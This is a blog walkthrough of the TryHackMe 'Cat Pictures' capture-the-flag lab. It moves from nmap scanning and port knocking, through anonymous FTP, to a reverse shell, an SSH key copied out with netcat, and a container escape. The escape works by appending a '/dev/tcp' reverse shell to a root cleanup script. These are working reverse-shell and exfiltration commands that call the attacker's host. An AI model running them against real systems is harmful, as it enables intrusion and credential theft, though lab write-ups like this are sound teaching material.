DEV Community

Cover image for TryHackMe: Cat Pictures - Walkthrough
hamzairshad02
hamzairshad02

Posted on • Edited on

TryHackMe: Cat Pictures - Walkthrough

Machine Link: Cat Pictures

I was just browsing through TryHackMe and this picture had me intrigued.

Image description

So I launched the machine, and started off with the warmup (i.e. Nmap).

┌──(kali㉿kali)-[~]
└─$ nmap -T4 -v -A 10.10.248.4                       
Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-09 12:15 EDT
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:15
Completed NSE at 12:15, 0.00s elapsed
Initiating NSE at 12:15
Completed NSE at 12:15, 0.00s elapsed
Initiating NSE at 12:15
Completed NSE at 12:15, 0.00s elapsed
Initiating Ping Scan at 12:15
Scanning 10.10.248.4 [2 ports]
Completed Ping Scan at 12:15, 0.46s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:15
Completed Parallel DNS resolution of 1 host. at 12:15, 0.01s elapsed
Initiating Connect Scan at 12:15
Scanning 10.10.248.4 [1000 ports]
Discovered open port 22/tcp on 10.10.248.4
Discovered open port 8080/tcp on 10.10.248.4
Connect Scan Timing: About 31.35% done; ETC: 12:17 (0:01:08 remaining)
Increasing send delay for 10.10.248.4 from 0 to 5 due to max_successful_tryno increase to 5
Increasing send delay for 10.10.248.4 from 5 to 10 due to max_successful_tryno increase to 6
Warning: 10.10.248.4 giving up on port because retransmission cap hit (6).
Completed Connect Scan at 12:16, 68.32s elapsed (1000 total ports)
Initiating Service scan at 12:16
Scanning 2 services on 10.10.248.4
Completed Service scan at 12:16, 10.91s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.248.4.
Initiating NSE at 12:16
Completed NSE at 12:17, 13.30s elapsed
Initiating NSE at 12:17
Completed NSE at 12:17, 2.00s elapsed
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
Nmap scan report for 10.10.248.4
Host is up (0.42s latency).
Not shown: 992 closed tcp ports (conn-refused)
PORT      STATE    SERVICE       VERSION
22/tcp    open     ssh           OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 37436480d35a746281b7806b1a23d84a (RSA)
|   256 53c682efd27733efc13d9c1513540eb2 (ECDSA)
|_  256 ba97c323d4f2cc082ce12b3006189541 (ED25519)
163/tcp   filtered cmip-man
1236/tcp  filtered bvcontrol
1717/tcp  filtered fj-hdnet
2522/tcp  filtered windb
4550/tcp  filtered gds-adppiw-db
8080/tcp  open     http          Apache httpd 2.4.46 ((Unix) OpenSSL/1.1.1d PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Unix) OpenSSL/1.1.1d PHP/7.3.27
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-title: Cat Pictures - Index page
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
49159/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.93 seconds
Enter fullscreen mode Exit fullscreen mode

So this machine comes with a bunch of ports including 8080 so lets look into the website.

Image description

I was expecting forums full of cattos but oh well. Lets look further into it.

Image description

The website gives a hint of Knock knock! Magic Numbers: 1111, 2222, 3333, 4444 which seems like port numbers so lets try Port Knocking.

Port Knocking is basically trying to access a filtered port in order to unlock it open. I’m using a tool called knockd to hit the ports.

┌──(kali㉿kali)-[~]
└─$ knock 10.10.248.4 -v 1111 2222 3333 4444
hitting tcp 10.10.248.4:1111
hitting tcp 10.10.248.4:2222
hitting tcp 10.10.248.4:3333
hitting tcp 10.10.248.4:4444
Enter fullscreen mode Exit fullscreen mode

After knocking on these ports lets do a nmap scan again and we’ll see ftp port now being opened.

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.13.29.133
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|*End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|*-rw-r--r--    1 ftp      ftp           162 Apr 02  2021 note.txt
Enter fullscreen mode Exit fullscreen mode

The nmap scan even shows a note.txt file through the anonymous ftp login so after picking it up from the ftp it shows the following content.

In case I forget my password, I'm leaving a pointer to the internal shell service on the server.

Connect to port 4420, the password is [password].
- catlover
Enter fullscreen mode Exit fullscreen mode

The note straight up tells us to login to port 4420 with the given password.

┌──(kali㉿kali)-[~]
└─$ nc 10.10.248.4 4420                              
INTERNAL SHELL SERVICE
please note: cd commands do not work at the moment, the developers are fixing it at the moment.
do not use ctrl-c
Please enter password:
[password]
Password accepted
ls
bin
etc
home
lib
lib64
opt
tmp
usr
ls home
catlover
ls home/catlover
runme
Enter fullscreen mode Exit fullscreen mode

After logging in and roaming around a bit we find the shell to be a bit limited with a directory called catlover with a runme file inside.

./home/catlover/runme
THIS EXECUTABLE DOES NOT WORK UNDER THE INTERNAL SHELL, YOU NEED A REGULAR SHELL.
Enter fullscreen mode Exit fullscreen mode

Upon running the file it asks us to run it with a Regular Shell. So lets try to get one.

ls usr/bin
mkfifo
touch
wget
Enter fullscreen mode Exit fullscreen mode

Digging a little further, we see that the machine can run mkfifo, touch and wget. Since touch is to make files and wget and only get from ftp,http and https port we gotta go with mkfifo so lets take help from revshells.com and make a reverse shell using the nc mkfifo method.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.13.29.133 9001 >/tmp/f
Enter fullscreen mode Exit fullscreen mode

Start a netcat listener and get the reverse shell.

┌──(kali㉿kali)-[~]
└─$ nc -nvlp 9001
listening on [any] 9001 ...
connect to [10.13.29.133] from (UNKNOWN) [10.10.248.4] 56820
sh: 0: can't access tty; job control turned off
# ls
bin
etc
home
lib
lib64
opt
tmp
usr
Enter fullscreen mode Exit fullscreen mode

With the new shell. Lets pick the runme file by running the following command.

nc [YOUR MACHINE IP] 443 < home/catlover/runme
Enter fullscreen mode Exit fullscreen mode

Then start a netcat listener on your machine.

nc -nlvp 443 > runme
Enter fullscreen mode Exit fullscreen mode

After making the connection just Ctrl+C it and you’ll see the runme file on your machine.

┌──(kali㉿kali)-[~]
└─$ chmod +x runme

┌──(kali㉿kali)-[~]
└─$ ./runme
Please enter yout password: [password]
Access Denied
Enter fullscreen mode Exit fullscreen mode

By trying to run it with the same old password it denies the access. Gotta analyze it. Lets use strings for that.

┌──(kali㉿kali)-[~]
└─$ strings runme                          
/lib64/ld-linux-x86-64.so.2
__gmon_start__
_ITM_deregisterTMCloneTable
_ITM_registerTMCloneTable
_ZNSaIcED1Ev
_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEC1Ev
_ZSt4endlIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_
_ZSt3cin
_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEC1EPKcRKS3_
_ZNSt8ios_base4InitD1Ev
_ZNSolsEPFRSoS_E
__gxx_personality_v0
_ZNSaIcEC1Ev
_ZNKSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE4dataEv
_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc
_ZNSt8ios_base4InitC1Ev
_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEED1Ev
_ZSt4cout
_ZNKSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE4sizeEv
_ZStrsIcSt11char_traitsIcESaIcEERSt13basic_istreamIT_T0_ES7_RNSt7__cxx1112basic_stringIS4_S5_T1_EE
_Unwind_Resume
__stack_chk_fail
__cxa_atexit
memcmp
system
__cxa_finalize
__libc_start_main
libstdc++.so.6
libgcc_s.so.1
libc.so.6
GCC_3.0
CXXABI_1.3
GLIBCXX_3.4.21
GLIBCXX_3.4
GLIBC_2.4
GLIBC_2.2.5
u+UH
ATSH
[A\]
[]A\A]A^A_
[password]
Please enter yout password: 
Welcome, catlover! SSH key transfer queued! 
touch /tmp/gibmethesshkey
Access Denied
Enter fullscreen mode Exit fullscreen mode

With this, we can see the password so lets try it out.

┌──(kali㉿kali)-[~]
└─$ ./runme
Please enter yout password: [password]
Welcome, catlover! SSH key transfer queued!
Enter fullscreen mode Exit fullscreen mode

By running it successfully it creates a file /tmp/gibmethesshkey in our tmp folder. The file is of no use to us so lets try running the runme file on the target machine with the password.

# ./home/catlover/runme
Please enter yout password: [password]
Welcome, catlover! SSH key transfer queued!
Enter fullscreen mode Exit fullscreen mode

After doing it, we see that a new id_rsa file has been created.

# ls /home/catlover
id_rsa
runme
Enter fullscreen mode Exit fullscreen mode

id_rsa is a file that serves as a key when logging through ssh. As we see in our nmap scan that we do have a ssh port lets dive into it. Pick the file from server by the same netcat method and run it with ssh.

Pick the id_rsa file by running the following command.

nc [YOUR MACHINE IP] 443 < home/catlover/id_rsa
Enter fullscreen mode Exit fullscreen mode

Then start a netcat listener on your machine.

nc -nlvp 443 > id_rsa
Enter fullscreen mode Exit fullscreen mode

After making the connection just Ctrl+C it and you’ll see the id_rsa file on your machine. Fix the permissions on it.

┌──(kali㉿kali)-[~]
└─$ chmod 600 id_rsa
Enter fullscreen mode Exit fullscreen mode

Time to do ssh.

┌──(kali㉿kali)-[~]
└─$ ssh catlover@10.10.248.4 -i id_rsa
The authenticity of host '10.10.248.4 (10.10.248.4)' can't be established.
ED25519 key fingerprint is SHA256:1eaD00/uot2wrnOhWADr5ZbjIDs9twYBymqkwtQKXk0.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.248.4' (ED25519) to the list of known hosts.
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-142-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat Sep  9 11:15:03 PDT 2023

  System load:  0.79               Users logged in:                0
  Usage of /:   37.2% of 19.56GB   IP address for eth0:            10.10.248.4
  Memory usage: 34%                IP address for br-98674f8f20f9: 172.18.0.1
  Swap usage:   0%                 IP address for docker0:         172.17.0.1
  Processes:    109

52 updates can be applied immediately.
25 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

Last login: Fri Jun  4 14:40:35 2021
root@7546fa2336d6:/#
Enter fullscreen mode Exit fullscreen mode

Aaaaand we got the shell.

root@7546fa2336d6:/# ls root
flag.txt
root@7546fa2336d6:/# cat root/flag.txt
[Flag 1]
root@7546fa2336d6:/# whoami
root
Enter fullscreen mode Exit fullscreen mode

As we can see we got the root with the flag but is the Root Flag itself? Nope. Upon submitting it we see it as being accepted as Flag 1 and not the Root Flag.

That seems sus. Are we inside a docker container as root then? One way to find it out. Look for .dockerenv file in the / directory.

root@7546fa2336d6:/# ls -al
total 108
drwxr-xr-x   1 root root 4096 Mar 25  2021 .
drwxr-xr-x   1 root root 4096 Mar 25  2021 ..
-rw-------   1 root root  588 Jun  4  2021 .bash_history
-rwxr-xr-x   1 root root    0 Mar 25  2021 .dockerenv
Enter fullscreen mode Exit fullscreen mode

Got em! Time to escape this container then. Searching inside of it we find a /opt/clean/clean.sh file. This file seems to be editable so we’ll take advantage of reverse shell here.

root@7546fa2336d6:/opt/clean# echo "bash -i >& /dev/tcp/10.13.29.133/443 0>&1" >> clean.sh  
root@7546fa2336d6:/opt/clean# cat clean.sh
#!/bin/bash

rm -rf /tmp/*
bash -i >& /dev/tcp/10.13.29.133/443 0>&1
Enter fullscreen mode Exit fullscreen mode

Adding a reverse shell into the file we now make it executable and run it.

root@7546fa2336d6:/opt/clean# chmod +x clean.sh
root@7546fa2336d6:/opt/clean# ls -al
total 16
drwxr-xr-x 2 root root 4096 May  1  2021 .
drwxrwxr-x 1 root root 4096 Mar 25  2021 ..
-rwxr-xr-x 1 root root   69 Sep 10 10:38 clean.sh
root@7546fa2336d6:/opt/clean# ./clean.sh
Enter fullscreen mode Exit fullscreen mode

Now opening our netcat listener.

┌──(kali㉿kali)-[~]
└─$ nc -nvlp 443
listening on [any] 443 ...
connect to [10.13.29.133] from (UNKNOWN) [10.10.136.91] 54742
bash: cannot set terminal process group (2120): Inappropriate ioctl for device
bash: no job control in this shell
root@cat-pictures:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@cat-pictures:~# whoami
whoami
root
root@cat-pictures:~# hostname
hostname
cat-pictures
Enter fullscreen mode Exit fullscreen mode

Now all we gotta do is see the flag and that’s the end of the road.

root@cat-pictures:~# ls
ls
firewall
root.txt
root@cat-pictures:~# cat root.txt
cat root.txt
Congrats!!!
Here is your flag:

[Root Flag]
Enter fullscreen mode Exit fullscreen mode

Hope you like this walkthrough. Happy Hacking!!

Top comments (0)